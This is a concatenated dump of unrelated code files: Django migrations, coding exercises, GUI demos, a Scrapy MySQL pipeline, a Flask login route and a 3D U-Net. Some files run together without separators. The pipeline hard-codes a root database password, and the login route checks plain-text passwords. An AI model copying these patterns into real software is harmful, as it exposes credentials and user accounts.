            ],
            options={
                'abstract': False,
            },
        ),
        migrations.AddField(
            model_name='irfattachmentcambodia',
            name='interception_record',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='dataentry.IrfCambodia'),
        ),
        migrations.AddField(
            model_name='intercepteecambodia',
            name='interception_record',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='interceptees', to='dataentry.IrfCambodia'),
        ),
        migrations.AddField(
            model_name='intercepteecambodia',
            name='person',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='dataentry.Person'),
        ),
    ]
|
# Generated by Django 3.1.4 on 2021-01-05 06:58
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial auto-generated schema: a Funding record (an on-chain UTXO
    with liquidation/maturity parameters) and its one-to-one Settlement
    (the spending transaction and payout split). Generated code — create
    a new migration rather than editing field definitions here.
    """
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Funding',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('address', models.CharField(max_length=60)),
                ('transaction', models.CharField(max_length=70)),
                ('output_index', models.IntegerField()),
                ('low_liquidation_price', models.IntegerField()),
                ('high_liquidation_price', models.IntegerField()),
                ('earliest_liquidation_height', models.IntegerField()),
                ('maturity_height', models.IntegerField()),
                ('low_truncated_zeroes', models.CharField(max_length=10)),
                ('high_low_delta_truncated_zeroes', models.CharField(max_length=10)),
                ('hedge_units_x_sats_per_bch_high_trunc', models.IntegerField()),
                ('payout_sats_low_trunc', models.IntegerField()),
            ],
        ),
        migrations.CreateModel(
            name='Settlement',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('spending_transaction', models.CharField(max_length=70)),
                ('settlement_type', models.CharField(max_length=20)),
                ('hedge_satoshis', models.IntegerField()),
                ('long_satoshis', models.IntegerField()),
                ('oracle_price', models.IntegerField()),
                ('funding', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='main.funding')),
            ],
        ),
    ]
|
from tensorflow.python.tools.inspect_checkpoint import print_tensors_in_checkpoint_file
import os
# List the tensor names (not their values) stored in one training checkpoint.
model_dir = '/work/isanchez/g/ds4-gdl-lrdecay/subpixel'
checkpoint_path = os.path.join(model_dir, "model-329")
print_tensors_in_checkpoint_file(file_name=checkpoint_path, tensor_name='', all_tensors=False)
# Sum of gcd(a_1..a_n) over all k**n tuples with entries in 1..k, mod 1e9+7
# (ABC162 E style). Uses top-down inclusion-exclusion over divisors.
MOD = 10 ** 9 + 7
n, k = map(int, input().split())
# x[i] ends up holding the number of tuples whose gcd is EXACTLY i.
x = [0 for _ in range(k + 1)]
ans = 0
for i in range(k, 0, -1):
    # (k // i) ** n tuples have every element divisible by i ...
    x[i] = pow(k // i, n, MOD)
    t = 0  # NOTE(review): unused in the visible code
    # ... minus the tuples whose gcd is a proper multiple of i.
    for j in range(2 * i, k + 1, i):
        x[i] -= x[j]
        x[i] %= MOD
    ans += i * x[i] % MOD
    ans %= MOD
print(ans)
|
#! /usr/bin/python3
# CGI endpoint: look up hard-coded vehicle records by plate number.
print("content-type: text/html")
print()
import cgi
fs = cgi.FieldStorage()
# "commands" carries the plate number submitted by the form.
p_no = fs.getvalue("commands")
if p_no=="SV16 FOX":
    print('''<pre>Name : Rocky
License No :80819091
Vehicle Type :MCWG
Engine No : bhjik2314
Insurance validity : 7/07/2028</pre>''')
elif p_no=="MH 20EE 7598":
    print('''<pre>Name : Ajay
License No :20897213
Vehicle Type :LMV
Engine No : khgt5677
Insurance validity : 2/12/2030</pre>''')
else:
    print("No records available")
|
def merge_sort(A):
    """Stable top-down merge sort; returns a new sorted list.

    Lists of length <= 1 are returned unchanged; the input is never mutated.
    """
    if len(A) <= 1:
        return A
    half = len(A) // 2
    left = merge_sort(A[:half])
    right = merge_sort(A[half:])
    # Merge the two sorted halves; `<=` keeps equal items in left-first
    # order, which makes the sort stable.
    merged = []
    i = j = 0
    while i < len(left) and j < len(right):
        if left[i] <= right[j]:
            merged.append(left[i])
            i += 1
        else:
            merged.append(right[j])
            j += 1
    merged.extend(left[i:])
    merged.extend(right[j:])
    return merged
# Read a count (unused beyond input format) and a list of ints, then print
# the odd values in ascending order followed by the evens in descending order.
n = int(input())
using_list = list(map(int, input().split()))
evens, odds = [], []
for elem in using_list:
    if elem % 2 == 0:
        evens.append(elem)
    else:
        odds.append(elem)
print(' '.join(map(str, merge_sort(odds) + merge_sort(evens)[-1::-1])))
|
# when importing this module/folder, actually import all classes in all modules in this folder
def is_uuid(text, cde_type = None):
    """Heuristically decide whether *text* is a Kindle/calibre UUID.

    - 36 chars with dashes at 8/13/18/23: accepted for cde_type 'EBOK'/None
      (hex digits deliberately not checked — very unlikely not to be hex).
    - 32 lower-case hex chars: accepted for cde_type 'PDOC'/None.
    - Anything else (including empty): False.
    """
    def is_hex(s):
        # calibre ids use only lower-case hex digits.
        # Iterative check: the previous recursive version recursed once
        # per character and could hit the recursion limit on long input.
        return all(c in '0123456789abcdef' for c in s)
    if not text:
        return False
    if len(text) == 36:
        # very unlikely not to be hex, so only the dash layout is verified
        return cde_type in ('EBOK', None) and text[8] == '-' and text[13] == '-' and text[18] == '-' and text[23] == '-'
    if len(text) == 32:
        return cde_type in ('PDOC', None) and is_hex(text)
    # good enough
    return False
# Kindle service identifiers and the proxy path prefixes they map to.
TODO = 'todo-g7g'
TODO_PATH = '/FionaTodoListProxy/'
CDE = 'cde-g7g'
CDE_PATH = '/FionaCDEServiceEngine/'
FIRS = 'firs-g7g'
FIRS_PATH = '/FirsProxy/'
FIRS_TA = 'firs-ta-g7g'
#WWW = 'www'
#EMBER_PATH = '/gp/ember/xyml/'
#STORE_PATH = '/gp/g7g/xyml1/'
# _handlers = []
# def register(h):
# _handlers.append(h)
# def match(r):
# for h in _handlers:
# if h.accept(r):
# return r
# the order here is the order in which handlers are matched when processing a request
from .ksp import *
from .sync_metadata import *
#from .get_metadata import *
from .get_items import *
from .remove_items import *
from .download_content import *
from .upload_snapshot import *
from .sidecar import *
from .get_pagenumbers import *
from .get_annotations import *
from .collections import *
from .registration import *
#from .store import *
from .images import *
|
# SCons build script for the design-pattern demos built on the CII library.
import os.path
env = Environment(CPPPATH='vendor/cii20/src') # Create an environment
env.Append(CCFLAGS = ['-g','-O3' ,'-Wall'])
def filtered_glob(env, pattern, omit=None,
    ondisk=True, source=False, strings=False):
    """Like env.Glob(pattern), but drop files whose basename is in *omit*.

    Returns a list (the previous version returned a lazy ``filter`` object,
    which SCons may iterate more than once) and avoids the shared mutable
    default argument ``omit=[]``. ondisk/source/strings are kept for
    signature compatibility; they are not forwarded (as before).
    """
    omit = omit or []
    return [f for f in env.Glob(pattern)
            if os.path.basename(f.path) not in omit]
env.AddMethod(filtered_glob, "FilteredGlob");
# CII object files, excluding sources that do not build in this setup
# (C++ sample and the platform threading backends).
ciifiles = env.Object(env.FilteredGlob('vendor/cii20/src/*.c',
    ['SpeciallyTreatedFile.cc', 'thread-nt.c','thread.c']))
# Shared helper code used by several pattern demos.
libcommon_target = "common"
libcommon_sources = [ Glob("src/common/*.c"), "libcii.a" ]
libcommon = env.StaticLibrary(target = libcommon_target, source = libcommon_sources)
# The CII runtime library itself, built from the filtered object list.
# (Removed the unused `libcii_sources` variable: libcii is built from
# `ciifiles`, not from a fresh Glob.)
libcii_target = "cii"
libcii = env.StaticLibrary(target = libcii_target, source = ciifiles)
# One test Program per design-pattern demo. Each entry is
# (directory, needs_libcommon); every demo also links against libcii.a.
# This table replaces 23 near-identical env.Program calls; the emitted
# build nodes are the same as before.
PATTERN_PROGRAMS = [
    ("src/Behavioral/Chain_Of_Responsibility", False),
    ("src/Behavioral/Command", True),
    ("src/Behavioral/Interpreter", True),
    ("src/Behavioral/Iterator", True),
    ("src/Behavioral/Mediator", False),
    ("src/Behavioral/Memento", True),
    ("src/Behavioral/Observer", False),
    ("src/Behavioral/State", True),
    ("src/Behavioral/Strategy", True),
    ("src/Behavioral/Template_Method", True),
    ("src/Behavioral/Visitor", False),
    ("src/Creational/Abstract_Factory", True),
    ("src/Creational/Builder", True),
    ("src/Creational/Factory_Method", True),
    ("src/Creational/Prototype", False),
    ("src/Creational/Singleton", False),
    ("src/Structural/Adapter", False),
    ("src/Structural/Bridge", False),
    ("src/Structural/Composite", False),
    ("src/Structural/Decorator", True),
    ("src/Structural/Facade", True),
    ("src/Structural/Flyweight", False),
    ("src/Structural/Proxy", False),
]
for pattern_dir, needs_common in PATTERN_PROGRAMS:
    libs = (["libcommon.a"] if needs_common else []) + ["libcii.a"]
    env.Program(source=[Glob(pattern_dir + "/*.c")] + libs,
                target=pattern_dir + "/test")
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import pymysql
class BokeepjtPipeline(object):
    """Scrapy pipeline that stores scraped blog-post rows into MySQL."""

    def __init__(self):
        # Connect to the target database (host, user, password, db name).
        self.conn = pymysql.connect("127.0.0.1", "root", "seven456", "bokee")

    def process_item(self, item, spider):
        """Insert one row per post; the item carries parallel lists."""
        with self.conn.cursor() as cursor:
            for j in range(len(item["name"])):
                # Parameterized query: the previous string-concatenated SQL
                # was injectable and broke on quotes in titles. Also fixes
                # the bug item["comment"]["j"] (string literal used as index).
                cursor.execute(
                    "insert into mybokee(name,url,hits,comment) "
                    "VALUES(%s,%s,%s,%s)",
                    (item["name"][j], item["url"][j],
                     item["hits"][j], item["comment"][j]),
                )
        # pymysql does not autocommit by default; without this the inserts
        # were never persisted.
        self.conn.commit()
        return item

    def close_spider(self, spider):
        # Close the database connection when the spider finishes.
        self.conn.close()
|
# Read two integers and one real number, then print three derived values.
inteiro1=int(input("Digite o primeiro número inteiro(Por exemplo 1,2,3..): "))
inteiro2=int(input("Digite o segundo número inteiro(Por exemplo 1,2,3..): "))
real=float(input("Digite um número real(Por exemplo 1.25, 1/2...): "))
# product of twice the first with half of the second
a=inteiro1*2*(inteiro2/2)
print("O produto do dobro do primeiro com metade do segundo é: ", a)
# triple of the first plus the real ("third") number
b=(inteiro1*3)+real
print("A soma do triplo do primeiro com o terceiro é: ", b)
# the real number cubed
c=real**3
print("O terceiro elevado ao cubo é: ", c)
from opster import command
@command()
def main(arg1, arg2, arg3=None, arg4='arg4',
         opt1=('', 'opt1', 'help for --opt1'),
         *args,
         opt2=('', 'opt2', 'help for --opt2')):
    # Demo of opster option tuples (short, long, help); opt2 is declared
    # after *args, so it is keyword-only on the Python side.
    print(arg1, arg2, arg3, arg4)
    print(args)
    print(opt1, opt2)


if __name__ == '__main__':
    main.command()
|
from PySide2.QtWidgets import *
class Window(QWidget):
    """Demo window: a vertical slider drives a progress bar."""

    def __init__(self):
        QWidget.__init__(self)
        self.setWindowTitle("IHM")
        self.setMinimumSize(500,300)
        self.layout = QHBoxLayout()
        self.Qbar = QProgressBar()
        self.slider = QSlider()
        self.Qbar.setValue(0)
        # (Removed a stray `self.slider.value()` call: its return value was
        # discarded, so the statement had no effect.)
        # Keep bar and slider in sync: slider moves update the bar value.
        self.slider.valueChanged.connect(self.Qbar.setValue)
        self.layout.addWidget(self.Qbar)
        self.layout.addWidget(self.slider)
        self.setLayout(self.layout)
if __name__ == "__main__":
    # Create the application, show one window, and run the Qt event loop.
    app = QApplication([])
    win = Window()
    win.show()
    app.exec_()
|
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk
from gi.repository import Gdk
# Application-wide CSS; selectors match the widget names assigned with
# set_name() in HelloWorldWindow below.
css = b"""
#hello_world_window {
background-color: red;
}
#hello_world_button {
background-color: blue;
}
"""
style_provider = Gtk.CssProvider()
style_provider.load_from_data(css)
class HelloWorldWindow(Gtk.Window):
    """A single-button window; the widget names are the CSS hooks."""
    def __init__(self):
        Gtk.Window.__init__(self, title="Linux at PUCP")
        self.set_name('hello_world_window')
        self.set_border_width(10)
        self.button = Gtk.Button(label="Go to linux playa!!")
        self.button.set_name('hello_world_button')
        self.button.connect("clicked", self.on_button_clicked)
        self.add(self.button)
    def on_button_clicked(self, widget):
        # Click handler: just logs to stdout.
        print("Hello Linux at PUCP!! :D")
def main():
    """Install the CSS provider screen-wide, show the window, run Gtk."""
    win = HelloWorldWindow()
    Gtk.StyleContext.add_provider_for_screen(
        Gdk.Screen.get_default(),
        style_provider,
        Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION
    )
    win.connect("delete-event", Gtk.main_quit)
    win.show_all()
    Gtk.main()
if __name__ == '__main__':
    main()
|
# Baekjoon 9461 — Padovan sequence.
_PADOVAN = [1, 1, 1]  # P(1)..P(3); extended lazily and shared across queries


def padovan(x):
    """Return the x-th (1-indexed) Padovan number, P(n) = P(n-2) + P(n-3)."""
    while len(_PADOVAN) < x:
        _PADOVAN.append(_PADOVAN[-2] + _PADOVAN[-3])
    return _PADOVAN[x - 1]


if __name__ == '__main__':
    # The original rebuilt the whole sequence for every query and left
    # debug prints (print(j), print(arr)) in the output, which would be
    # rejected by the judge; now only the answers are printed and the
    # cache is reused across queries.
    r = int(input())
    for _ in range(r):
        print(padovan(int(input())))
|
import os
from collections import defaultdict
import csv
import json
def load_json(path):
    """Read and parse the JSON document at *path*."""
    with open(path) as handle:
        return json.load(handle)
def write_json_file(filename, data):
    """Serialize *data* as pretty-printed, non-ASCII-safe JSON to *filename*.

    A ``.json`` extension is appended when missing. Bug fix: the previous
    version discarded the requested name entirely and always wrote to the
    literal file "(unknown).json".
    """
    _, ext = os.path.splitext(filename)
    if ext != ".json":
        filename += ".json"
    with open(filename, 'w') as out_file:
        json.dump(data, out_file, ensure_ascii=False, indent=2)
class KagglePreparer:
    """Writes bags of gifts to the Kaggle submission CSV format."""

    def save(self, file_name, bags):
        """Write *bags* (iterables of gift names) to *file_name*.

        The file starts with a 'Gifts' header line; each bag becomes one
        tab-separated row of id-tagged gift names.
        """
        numbered_bags = self._add_ids_to_gifts(bags)
        with open(file_name, "w", newline="") as out:
            out.write('Gifts\n')
            csv.writer(out, delimiter='\t').writerows(numbered_bags)

    def _add_ids_to_gifts(self, bags):
        # A single controller so ids are unique across all bags.
        controller = IdController()
        return [
            [controller.convert_gift_to_kaggle_format(gift) for gift in bag]
            for bag in bags
        ]
class IdController:
    """Tags each gift name with a running per-type index: 'horse' -> 'horse_0'."""

    def __init__(self):
        # gift name -> next index to hand out
        self.ids = defaultdict(int)

    def convert_gift_to_kaggle_format(self, gift: str):
        """Return *gift* suffixed with its next sequential id."""
        index = self.ids[gift]
        self.ids[gift] = index + 1
        return f'{gift}_{index}'
|
import requests
import json
@app.route("/login", methods=['GET', 'POST'])
def login():
    """Authenticate an email/password user and return a JSON response.

    POST body (JSON): {"email": ..., "password": ...}
    Response fields: result (bool), user (name or None), token, comments.
    GET requests are rejected with a plain error string.
    """
    if request.method == "GET":
        return "wrong request"
    data = request.get_json(force=True)
    email = data['email']
    password = data['password']
    # NOTE(review): passwords appear to be compared as plain text in the
    # DB — they should be hashed (e.g. werkzeug.security); confirm schema.
    db = MySQLdb.connect("localhost", "root", "password", "python_api")
    sql = ("SELECT * FROM `users` WHERE email=%s and password=%s "
           "and external_type='email'")
    resp = {'result': False, 'user': None}
    try:
        cursor = db.cursor()
        cursor.execute(sql, (email, password))
        results = cursor.fetchall()
        if len(results) == 1:
            row = results[0]
            resp['result'] = True
            resp['comments'] = "one user found"
            resp['user'] = row[1]   # column 1: user name (per original code)
            resp['token'] = row[4]  # column 4: auth token (per original code)
        elif not results:
            resp['comments'] = "No users"
        else:
            resp['comments'] = "multiple users!!"
    except MySQLdb.Error as exc:
        # Narrowed from a bare `except:` that silently swallowed every error.
        print("Error: unable to fetch data:", exc)
    finally:
        # Always release the connection, even when the query fails
        # (previously db.close() was skipped on the success path's errors).
        db.close()
    return json.dumps(resp)
# Collect a player's per-match goal counts into a dict and report totals.
# Renamed the main variables: the original shadowed the builtins `dict`
# and (stylistically) used `lista` for the goal list.
jogador = {}
gols = []
jogador['nome'] = str(input('Nome do jogador: ')).capitalize()
partidas = int(input(f'Quantas partidas {jogador["nome"]} jogou? '))
for c in range(0, partidas):
    gols.append(int(input(f' Quantos gols na {c}° partida? ')))
jogador['gols'] = gols[:]
jogador['total'] = sum(gols)
print('-='*30)
print(jogador)
print('-='*30)
for k, v in jogador.items():
    print(f'O campo {k} tem valor {v}')
print('-='*30)
print(f'O jogador {jogador["nome"]} jogou {partidas} partidas.')
for i, v in enumerate(gols):
    print(f' => Na partida {i}, fez {v} gols.')
print(jogador['total'])
|
#----------- Importacion de modulos --------------#
from datetime import datetime
from data_sql import data, horario
import time
#-------------------------------------------------#
now = datetime.now()  # snapshot taken once at import time
hora = now.hour  # current hour, used by bloque() below
Fecha = '{:%d de %b / %H:%M:%S}'.format(now)  # human-readable timestamp
dia = '{:%a}'.format(now) # abbreviated weekday name ('Mon', 'Tue', ...)
#-------------------------------------------------#
#------------- Led on/off msg --------------------#
def Led_asig(Aula, dia, block): # db of Aula('AA'...), dia(Lunes...), block('A','B'...),
    """Decide the LED state for a room/day/time-block from the schedule DB.

    Returns 'on' when a class is scheduled, 'off' for empty slots and
    holidays ('Feriado'). The query result itself is not read here; the
    cursor state is presumably consumed by horario() — TODO confirm.
    """
    data.cursor.execute(data.select_hora(Aula, block))
    clase = horario()[dia]
    # Idiom fix: membership test instead of `!= None and != 'Feriado'`.
    state = 'on' if clase not in (None, 'Feriado') else 'off'
    print(state)
    return state
#------------ Block msg --------------------------#
bloc = 0  # last computed time block; stays 0 outside teaching hours


def bloque():
    """Return (time-block letter, weekday index 1..5) for the current time.

    Reads the module-level ``hora``/``now`` captured at import time.
    Bug fix: the original left ``dayx`` unbound on Saturday/Sunday
    (UnboundLocalError); weekends now return dayx = 0, and off-hours
    leave ``bloc`` at its previous value, as before.
    """
    global bloc
    dia = '{:%a}'.format(now)  # abbreviated weekday name
    # Two-hour teaching blocks: 7-9 'A', 9-11 'B', 11-13 'C',
    # 14-16 'D', 16-18 'E' (13-14 is a gap, presumably lunch).
    for start, letter in ((7, 'A'), (9, 'B'), (11, 'C'), (14, 'D'), (16, 'E')):
        if hora in range(start, start + 2):
            bloc = letter
            break
    dayx = {'Mon': 1, 'Tue': 2, 'Wed': 3, 'Thu': 4, 'Fri': 5}.get(dia, 0)
    return bloc, dayx
#-------------------------------------------------#
# print(Fecha)
# print(dia)
|
# 3D-UNet model.
# x: 128x128 resolution for 32 frames.
import torch
import torch.nn as nn
def conv_block_3d(in_dim, out_dim, activation):
    """Conv3d(k=3, s=1, p=1) -> BatchNorm3d -> activation; keeps spatial size."""
    layers = [
        nn.Conv3d(in_dim, out_dim, kernel_size=3, stride=1, padding=1),
        nn.BatchNorm3d(out_dim),
        activation,
    ]
    return nn.Sequential(*layers)
def conv_trans_block_3d(in_dim, out_dim, activation):
    """Transposed conv that doubles each spatial dim, then BN + activation."""
    layers = [
        nn.ConvTranspose3d(in_dim, out_dim, kernel_size=3, stride=2,
                           padding=1, output_padding=1),
        nn.BatchNorm3d(out_dim),
        activation,
    ]
    return nn.Sequential(*layers)
def conv_trans_block_2_3d(in_dim, out_dim, activation):
    """Transposed conv that triples each spatial dim, then BN + activation."""
    layers = [
        nn.ConvTranspose3d(in_dim, out_dim, kernel_size=3, stride=3,
                           padding=1, output_padding=2),
        nn.BatchNorm3d(out_dim),
        activation,
    ]
    return nn.Sequential(*layers)
def max_pooling_3d():
    """Max-pool that halves each spatial dimension (k=2, s=2, no padding)."""
    pool = nn.MaxPool3d(kernel_size=2, stride=2, padding=0)
    return pool
def max_pooling_2_3d():
    """Max-pool with window 2 and stride 3 (roughly a 3x downsampling)."""
    pool = nn.MaxPool3d(kernel_size=2, stride=3, padding=0)
    return pool
def conv_block_2_3d(in_dim, out_dim, activation):
    """Two 3x3x3 convs (conv-BN-act, then conv-BN); note that the second
    BatchNorm is NOT followed by an activation, matching the original."""
    layers = [
        conv_block_3d(in_dim, out_dim, activation),
        nn.Conv3d(out_dim, out_dim, kernel_size=3, stride=1, padding=1),
        nn.BatchNorm3d(out_dim),
    ]
    return nn.Sequential(*layers)
class UNet(nn.Module):
    """3-D U-Net: five encoder stages, a bridge, and five decoder stages
    with skip connections concatenated on the channel axis.

    NOTE(review): the traced shapes in the comments assume a cubic
    ~120^3 input while the file header mentions 128x128x32 — confirm the
    intended input size against the caller. The fourth pool uses stride 3
    and the first up-path skips its transposed conv (bridge is concatenated
    with down_5 directly at the same resolution).
    """
    def __init__(self, in_dim, out_dim, num_filters):
        super(UNet, self).__init__()
        self.in_dim = in_dim
        self.out_dim = out_dim
        self.num_filters = num_filters
        activation = nn.LeakyReLU(0.2, inplace=True)
        # Down sampling
        self.down_1 = conv_block_2_3d(self.in_dim, self.num_filters, activation)
        self.pool_1 = max_pooling_3d()
        self.down_2 = conv_block_2_3d(self.num_filters, self.num_filters * 2, activation)
        self.pool_2 = max_pooling_3d()
        self.down_3 = conv_block_2_3d(self.num_filters * 2, self.num_filters * 4, activation)
        self.pool_3 = max_pooling_3d()
        self.down_4 = conv_block_2_3d(self.num_filters * 4, self.num_filters * 8, activation)
        self.pool_4 = max_pooling_2_3d()
        self.down_5 = conv_block_2_3d(self.num_filters * 8, self.num_filters * 16, activation)
        # self.pool_5 = max_pooling_3d()
        # Bridge
        self.bridge = conv_block_2_3d(self.num_filters * 16, self.num_filters * 32, activation)
        # Up sampling
        # self.trans_1 = conv_trans_block_3d(self.num_filters * 32, self.num_filters * 32, activation)
        self.up_1 = conv_block_2_3d(self.num_filters * 48, self.num_filters * 16, activation)
        self.trans_2 = conv_trans_block_2_3d(self.num_filters * 16, self.num_filters * 16, activation)
        self.up_2 = conv_block_2_3d(self.num_filters * 24, self.num_filters * 8, activation)
        self.trans_3 = conv_trans_block_3d(self.num_filters * 8, self.num_filters * 8, activation)
        self.up_3 = conv_block_2_3d(self.num_filters * 12, self.num_filters * 4, activation)
        self.trans_4 = conv_trans_block_3d(self.num_filters * 4, self.num_filters * 4, activation)
        self.up_4 = conv_block_2_3d(self.num_filters * 6, self.num_filters * 2, activation)
        self.trans_5 = conv_trans_block_3d(self.num_filters * 2, self.num_filters * 2, activation)
        self.up_5 = conv_block_2_3d(self.num_filters * 3, self.num_filters * 1, activation)
        # Output
        self.out = conv_block_3d(self.num_filters, out_dim, activation)
    def forward(self, x):
        """Encode, bridge, then decode with channel-wise skip concats."""
        # Down sampling
        down_1 = self.down_1(x) # -> [1, 4, 120, 120, 120]
        pool_1 = self.pool_1(down_1) # -> [1, 4, 60, 60, 60]
        down_2 = self.down_2(pool_1) # -> [1, 8, 60, 60, 60]
        pool_2 = self.pool_2(down_2) # -> [1, 8, 30, 30, 30]
        down_3 = self.down_3(pool_2) # -> [1, 16, 30, 30, 30]
        pool_3 = self.pool_3(down_3) # -> [1, 16, 15, 15, 15]
        down_4 = self.down_4(pool_3) # -> [1, 32, 15, 15, 15]
        pool_4 = self.pool_4(down_4) # -> [1, 32, 5, 5, 5]
        down_5 = self.down_5(pool_4) # -> [1, 64, 5, 5, 5]
        # Bridge
        bridge = self.bridge(down_5) # -> [1, 128, 5, 5, 5]
        # Up sampling
        concat_1 = torch.cat([bridge, down_5], dim=1) # -> [1, 192, 5, 5, 5]
        up_1 = self.up_1(concat_1) # -> [1, 64, 5, 5, 5]
        trans_2 = self.trans_2(up_1) # -> [1, 64, 15, 15, 15]
        concat_2 = torch.cat([trans_2, down_4], dim=1) # -> [1, 96, 15, 15, 15]
        up_2 = self.up_2(concat_2) # -> [1, 32, 15, 15, 15]
        trans_3 = self.trans_3(up_2) # -> [1, 32, 30, 30, 30]
        concat_3 = torch.cat([trans_3, down_3], dim=1) # -> [1, 48, 30, 30, 30]
        up_3 = self.up_3(concat_3) # -> [1, 16, 30, 30, 30]
        trans_4 = self.trans_4(up_3) # -> [1, 16, 60, 60, 60]
        concat_4 = torch.cat([trans_4, down_2], dim=1) # -> [1, 24, 60, 60, 60]
        up_4 = self.up_4(concat_4) # -> [1, 8, 60, 60, 60]
        trans_5 = self.trans_5(up_4) # -> [1, 8, 120, 120, 120]
        concat_5 = torch.cat([trans_5, down_1], dim=1) # -> [1, 12, 120, 120, 120]
        up_5 = self.up_5(concat_5) # -> [1, 4, 120, 120, 120]
        # Output
        out = self.out(up_5) # -> [1, 3, 120, 120, 120]
        return out
|
import cv2
import sys
import numpy as np
import os
IMG_SIZE = (96, 96)
OUTPUT_DIR = './tmp'

face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
video_capture = cv2.VideoCapture(0)

# BUG FIX: make sure the output directory exists before writing crops into it.
os.makedirs(OUTPUT_DIR, exist_ok=True)

# Collect face crops from the webcam; `i` counts detected faces and every
# 8th crop is written to disk, until 120 faces have been seen.
i = 0
while i < 120:
    ret, frame = video_capture.read()
    # BUG FIX: the original ignored `ret`; on a failed read `frame` is None and
    # cvtColor crashes (and with no camera the loop could spin forever).
    if not ret:
        break
    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    faces = face_cascade.detectMultiScale(gray, 1.3, 5)
    for (x, y, w, h) in faces:
        img = cv2.resize(frame[y:y + h, x:x + w], IMG_SIZE)
        if i % 8 == 0:
            cv2.imwrite(os.path.join(OUTPUT_DIR, str(i) + '.jpg'), img)
        i += 1

video_capture.release()
cv2.destroyAllWindows()
|
# Should we sum every possible product? No --> pairing A's smallest values with
# B's largest values, in order, yields the minimum sum.
# Once you know how to obtain the minimum, the rest of the problem is straightforward.
# Time complexity: O(NlogN)
def solution(A, B):
    """Return the minimal sum of element-wise products between A and B.

    Pairs the smallest element of A with the largest of B, and so on.
    BUG FIX: the original sorted A and B in place, mutating the caller's
    lists; sorted() copies are used instead.
    """
    ascending = sorted(A)                   # A in ascending order
    descending = sorted(B, reverse=True)    # B in descending order
    return sum(a * b for a, b in zip(ascending, descending))
# Demo run: expected output is 1*5 + 2*4 + 4*4 = 29.
A, B =[1, 4, 2],[5, 4, 4]
print(solution(A,B))
# bfs: use a visited structure (2-dimensional)
# a one-time wall-breaking ability is provided
import numpy as np
class DistPearson:
    """Composition-based distance and Pearson correlation between two sequences.

    After calculate() (only computed for sequences longer than 11 residues):
      * distance -- Euclidean distance between the per-residue count vectors.
      * rcoeff   -- Pearson correlation coefficient of the two count vectors.
    """

    # Class-level defaults kept for backward compatibility.
    distance = 0
    rcoeff = 0

    def __init__(self, ori="", other="", seqtype="prot"):
        self.ori = np.asarray(list(ori))
        self.other = np.asarray(list(other))
        self.seqtype = seqtype
        # Symbol alphabet: gap, the 20 amino acids, and X (unknown).
        self.orddiv = np.asarray(list("-ACDEFGHIKLMNPQRSTVWYX"))
        self.numdiv = len(self.orddiv)
        # Pearson accumulators over the two count vectors.
        self.X = 0
        self.Y = 0
        self.X2 = 0
        self.Y2 = 0
        self.XY = 0
        # Per-symbol counts for each sequence.
        self.ori_acu = np.zeros((self.numdiv,), dtype=int)
        self.other_acu = np.zeros((self.numdiv,), dtype=int)
        # Per-instance results (shadow the class-level defaults).
        self.distance = 0
        self.rcoeff = 0

    def _count_symbols(self, seq, acc):
        """Accumulate per-symbol counts of seq into acc; unknown symbols are ignored."""
        for ch in seq:
            loc = np.where(self.orddiv == ch)[0]
            # BUG FIX: the original tested len() of the tuple returned by
            # np.where, which is always 1; test the index array itself.
            if loc.size > 0:
                acc[loc] += 1

    def calculate(self):
        """Compute distance and rcoeff (sequences of length <= 11 are skipped)."""
        LQ = len(self.ori)
        self._count_symbols(self.ori, self.ori_acu)
        self._count_symbols(self.other, self.other_acu)
        # BUG FIX: the original `if [ LQ > 11 ]:` tested a non-empty list
        # literal, which is always true; the intended length guard is restored.
        if LQ > 11:
            # Skip index 0 (the gap symbol) when accumulating.
            for x in range(1, self.numdiv):
                self.distance += pow(self.other_acu[x] - self.ori_acu[x], 2)
                self.X += self.other_acu[x]
                self.Y += self.ori_acu[x]
                self.X2 += pow(self.other_acu[x], 2)
                self.Y2 += pow(self.ori_acu[x], 2)
                self.XY += self.other_acu[x] * self.ori_acu[x]
            # Pearson formula with n hard-coded to 20 (amino acids), as in the
            # original -- NOTE(review): confirm 20 vs. numdiv - 1.
            self.rcoeff = ((20 * self.X2) - pow(self.X, 2)) * ((20 * self.Y2) - pow(self.Y, 2))
            if self.rcoeff > 0:
                self.rcoeff = ((20 * self.XY) - (self.X * self.Y)) / pow(self.rcoeff, 0.5)
            self.distance = pow(self.distance, 0.5)
class KDF:
    """Kyte-Doolittle hydropathy (KD) and flexibility (Flx) differences
    between two equal-length protein sequences ("ori" vs "other").

    After calculate():
      * KD  -- mean squared hydropathy difference per residue.
      * Flx -- mean squared difference of the smoothed flexibility profiles.
    Both remain -1 until calculate() has run.
    """

    KD = -1
    Flx = -1

    def __init__(self, ori="", other="", seqtype="prot"):
        # Query ("ori") and subject ("other") sequences as character arrays.
        self.ori = np.asarray( list( ori ) )
        self.other = np.asarray( list( other ) )
        self.seqtype = seqtype
        # Residue order used to index the Kyte-Doolittle scale below.
        self.AAKD = np.asarray( list( "ARNDCQEGHILKMFPSTWYV" ) );
        # Residues treated as "rigid" neighbours for the flexibility tables.
        self.Rigid = np.asarray( list( "ALHVYIFCWM" ) );
        # NOTE(review): KDp and the Flx* tables hold 21 values (leading 0) while
        # AAKD/AAFlex list 20 residues, yet lookups below index the tables
        # directly with np.where positions 0..19 -- possible off-by-one; confirm
        # against the reference scales.
        self.KDp = np.array( [ 0,1.8,-4.5,-3.5,-3.5,2.5,-3.5,-3.5,-0.4,-3.2,4.5,3.8,-3.9,1.9,2.8,-1.6,-0.8,-0.7,-0.9,-1.3,4.2 ] );
